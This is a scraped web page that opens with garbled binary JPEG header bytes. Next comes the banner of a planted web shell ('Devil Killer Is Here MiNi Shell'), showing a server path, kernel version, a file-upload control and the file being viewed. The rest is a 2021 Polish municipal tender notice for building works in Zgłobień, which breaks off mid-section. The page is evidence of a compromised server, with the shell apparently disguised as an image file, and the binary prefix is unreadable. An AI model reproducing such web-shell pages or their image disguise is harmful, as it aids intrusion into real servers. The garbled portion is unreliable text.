JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210617/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210617/0008648201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00086482 z dnia 2021-06-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zagospodarowanie terenu wokół Domu Ludowego w Zgłobniu – etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Boguchwała</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Suszyckich 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Boguchwała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@boguchwala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.boguchwala.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie terenu wokół Domu Ludowego w Zgłobniu – etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-976f9365-cf5a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00086482</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003450/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Zagospodarowanie terenu wokół Domu Ludowego w Zgłobniu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ˜https://miniportal.uzp.gov.pl/ https://www.bip.boguchwala.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">˜https://epuap.gov.pl/wps/portal;https://miniportal.uzp.gov.pl; poczta elektroniczna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się: drogą<br/>elektroniczną przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/), przez portal<br/>ePUAP(https://epuap.gov.pl/wps/portal) oraz przy użyciu poczty elektronicznej (um@boguchwala.pl,<br/>m.kotula@um.boguchwala.pl, m.pekala@um.boguchwala.pl) na zasadach określonych poniżej. 1.2.<br/>Osobami uprawnionymi przez Zamawiającego do kontaktu z Wykonawcami są: Monika Kotula –<br/>wyjaśnienia w sprawie procedury przetargowej w godzinach: ponie-działek – piątek 900-1500: tel. 17<br/>87 55 220 e-mail: m.kotula@um.boguchwala.pl,Michał Pękala – wyjaśnienia w sprawie procedury<br/>przetargowej w godzinach: ponie-działek – piątek 900-1500: tel. 17 87 55 220, email:<br/>m.pekala@um.boguchwala.pl. 1.3. Wykonawca zamierzający wziąć udział w postępowaniu o<br/>udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto<br/>na ePUAP ma dostęp do „Formularzy: złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”. 1.4. Wymagania techniczne i organizacyjne wysyłania i<br/>odbieraniakorespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w<br/>Regulaminie korzystania z miniPortalu oraz w warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP). 1.5. Wykonawca przystępując do niniejszego postępowania o<br/>udzieleniezamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w<br/>Regulaminie miniPortalu oraz zobowiązuje się, korzystając z miniPortalu, przestrzegać postanowień<br/>tego regulaminu.1.6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>„Formularzy do: złożenia i wycofania oferty” oraz do „Formularza do komunikacji” wynosi 150<br/>MB.1.7.Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy PZP,<br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,<br/>oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na<br/>ePUAP.1.8. Zamawiający informuje, że przedmiotowe postępowanie można wyszukać na „Liście<br/>wszystkich postępowań” w miniPortaIu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki „Postepowania". Jest ono dostępne równie na stronie internetowej Zamawiającego.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">˜1. Administratorem Pani/Pana danych osobowych<br/>przetwarzanych w ramach postępowania o udzielenie zamówienia publicznego w trybie<br/>podstawowym o numerze referencyjnym: RIZ.271.15.2021 jest Zamawiający, tj. Gmina Boguchwała z siedzibą przy ul. Suszyckich 33, 36-040Boguchwała -reprezentowana przez Burmistrza Boguchwały –<br/>dalejAdministrator lub Gmina. 2.Jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania<br/>Pani/Pana danych osobowych w związku z udzieleniem lub wykonywaniem zamówienia publicznego, a<br/>także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z<br/>InspektoremOchro-ny Danych Osobowych w Gminie za pomocą adresu: iod@boguchwala.pl 3.<br/>Pani/Pana dane osobowe przetwarzane są w celu wypełnienia obowiązków prawnych ciążących na<br/>Gminie w związku z udzieleniem zamówienia publicznego w wybranym przez Gminę trybie<br/>postępowania tj. na podstawieart. 6 ust. 1 lit. c RODO 4.W związku z przetwarzaniem danych w celach<br/>o których mowa w pkt 3odbiorcami Pani/Pana danych osobowych mogą być: 4.1. osoby lub podmioty,<br/>którym udostępniona zostanie dokumentacja postępowania w oparciu przepisy ustawy z dnia 27<br/>sierpnia 2009r. o finansach publicznych [Dz.U. z2019 roku, poz. 869 z późn. zm.]oraz ustawy z dnia<br/>11września2019 roku –Prawo Zamówień Publicznych [Dz.U. z 2019 roku, poz. 2019 z późn. zm.] –<br/>dalej PZP. 4.2.inne podmioty, które na podstawie stosownych umów podpisanych z Gminą<br/>Boguchwała przetwarzają dane osobowe dla których Administratorem jest Gmina Boguchwała. 5.<br/>Pani/Pana daneosobowe będą przechowywane,zgodnie z art. 97 ust. 1 ustawy PZP, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata,okres przechowywania obejmuje cały czas trwania umowy, a po tym czasie przez okres w zakresie<br/>wymaganym przez przepisy powszechnie obowiązującego prawa, tj. przepisy ustawy z<br/>dnia14lipca1983 r. o narodowym zasobie archiwalnym i archiwach oraz aktach wykonawczych do tej<br/>ustawy.6.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z<br/>udziałemw postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych<br/>danych wynikają z ustawy PZP; 7. W związku z przetwarzaniem Pani/Pana danych osobowych<br/>przysługują Pani/Panu następują-ce uprawnienia: 7.1. prawo dostępu dodanych osobowych, w tym<br/>prawo douzyskania kopii tych danych; 7.2. prawo do żądania sprostowania(poprawiania) danych<br/>osobowych – w przypadku gdy dane są nieprawidłowe lub niekompletne; 7.3.prawo do żądania<br/>ograniczenia przetwarzania danychosobowych9. Nie przysługuje Pani/Panu: 8.1. w związku z art. 17<br/>ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;8.2. prawo do przenoszenia<br/>danychosobowych, o którym mowa w art. 20RODO;8.3. na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust.1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz punkt wyżej</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIZ.271.15.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót obejmuje przebudowę sieci i przyłącza wody, rozbudowę kanalizacji deszczowej, przebudowę teletechniki, wymianę odcinków kanalizacji sanitarnej, zagospodarowanie terenu polegające na remoncie schodów przy budynku oraz budowie placu utwardzonego z kostki brukowej na podbudowie z kruszyw.<br/>a)	Przebudowa sieci wodociągowej obejmuje:<br/>-odcinek wodociągu o dł. 30,00 m i przyłącz wody o dł. 18,00 m wraz z budową stud-ni wodomierzowej przy hydrancie oraz montaż hydrantu nadziemnego, podwójnego.<br/>b)	Przebudowa sieci teletechnicznej obejmuje:<br/>- przebudowę przyłączy teletechnicznych z napowietrznych na ziemne, zabezpieczenie istniejących przyłączy rurami osłonowymi, wymianę 2 szt. słupów teletechnicznych oraz budowę studni kablowej, teletechnicznej.<br/>c)	Rozbudowa kanalizacji deszczowej obejmuje:<br/>- odcinek kanalizacji deszczowej o średnicy 200 mm i łącznej długości 50,00 m wraz z budową 4 szt. studni rewizyjnych, 2 szt. studzienek ściekowych ulicznych, fi 500 mm z osadnikiem oraz kratami ściekowymi żeliwnymi typu ciężkiego 650x 450 mm,<br/>- odcinek przyłącza kanalizacji deszczowej o średnicy 160 mm i długości 5,0 m (podłą-czenie rury spustowej),<br/>- budowę dwóch sztuk odwodnienia liniowego o łącznej długości 10,5 m.<br/>d)	Remont kanalizacji sanitarnej obejmuje wymianę dwóch przyłączy kanalizacji sanitar-nej wraz z włączeniem do istniejącej studni, łączna długość wymienianych odcinków to 22,0 m.<br/>e)	Zagospodarowanie terenu obejmuje:<br/>- budowę placu i drogę dojazdową do OSP z kostki brukowej gr. 8 cm, na podbudo-wie z kruszywa o łącznej grubości 40 cm, powierzchnia placu 440,00 m2, <br/>- budowę chodnika z kostki brukowej gr. 6 cm, na podbudowie z kruszywa o łącznej grubości 24 cm, powierzchnia chodnika 44,00 m2,<br/>- remont tarasu wejściowego do budynku DL oraz remont schodów terenowych przy wejściu do pomieszczeń GOK. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45232150-8 - Roboty w zakresie rurociągów do przesyłu wody</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający PRZEWIDUJE udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP do wysokości 50% wartości zamówienia podstawowego. <br/>11.1.	Określenie przedmiotu Zamówienia:<br/>Przedmiotem zamówienia będzie wykonanie podobnych robót budowlanych jak ro-boty budowlane znajdujące się w zakresie przedmiotowego zadania. <br/>11.2.	Zakres robót budowlanych<br/>Zamówienia te będą dotyczyć przedmiotu zamówienia i polegać będą na powtórze-niu podobnych robót budowanych, zgodnych z przedmiotem zamówienia podsta-wowego.<br/>11.3.	Warunki, na jakich zostanie udzielone zamówienie, o którym mowa w art. 214 ust. 1 pkt 7 ustawy PZP:<br/>Warunkiem udzielenia zamówienia będzie zarezerwowanie środków na ten cel w bu-dżecie Gminy Boguchwała. Udzielenie zamówienia zostanie poprzedzone przepro-wadzeniem negocjacji, których przedmiotem będzie cena oraz warunki realizacji za-mówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego może ubiegać się wykonawca, który spełnia warunki, dotyczące zdolności technicznej lub zawodowej tj.<br/>1)	posiada doświadczenie zawodowe rozumiane jako należyte wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał co najmniej jedno zadanie polegające na budowie lub przebudowie drogi, placu lub chodnika z kostki brukowej o pow. min 300 m2 i o wartości co najmniej 100.000,00 zł.<br/>2)	dysponuje lub będzie dysponował osobami posiadającymi uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie tj.<br/>a)	osobą zdolną do przyjęcia obowiązków kierownika budowy, która posiada uprawnienia do kierowania robotami budowlanymi bez ograniczeń: Kierownika budowy w specjalności inżynieryjnej: drogowej <br/>b)	Kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>c)	Kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych <br/>a wydane na podstawie wcześniej obowiązujących przepisów prawa wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa i decyzję o wpisie do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3. lit a) ustawy z dnia 7 lipca 1994 roku - Prawo Budowlane.<br/>Jednocześnie zamawiający zaznacza, iż zgodnie z art. 12a - ustawy z dnia 7 lipca 1994 roku - Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. <br/>Przez uprawnienia budowlane należy rozumieć uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, o których mowa w ustawie z dnia 7 lipca 1994 roku - Prawo budowlane, przepisach wykonawczych do ustawy Prawo budowlane, a także odpowiadające im, uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących, przepisów prawa oraz odpowiadające im uprawnienia wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów wyszczególnionych w punkcie Rozdziale VIII SWZ, na zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowanych<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z dokładnym wskazaniem długości odcinka w ramach każdej z inwestycji oraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>Wzór wykazu robót budowlanych stanowi załącznik nr 3 do SWZ.<br/>Wykaz osób<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, do kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami<br/>Wzór wykazu osób stanowi Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11.	Treść oferty stanowi wypełniony Formularz ofertowy – wg załącznika nr 1 do SWZ.<br/>12.	Wraz z ofertą muszą zostać złożone:<br/>12.1.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu z postępowania – załącznik nr 2 do SWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie składa każdy z Wykonawców). <br/>12.2.	Zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy<br/>12.3.	Pełnomocnictwo upoważniające do złożenia oferty – jeżeli dotyczy <br/>12.4.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonaw-ców wspólnie ubiegających się o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Każda oferta musi być zabezpieczona wadium o wartości: 1 500,00 zł (słownie: tysiąc pięćset złotych, 00/100). <h3 class="mb-0">6.5.) 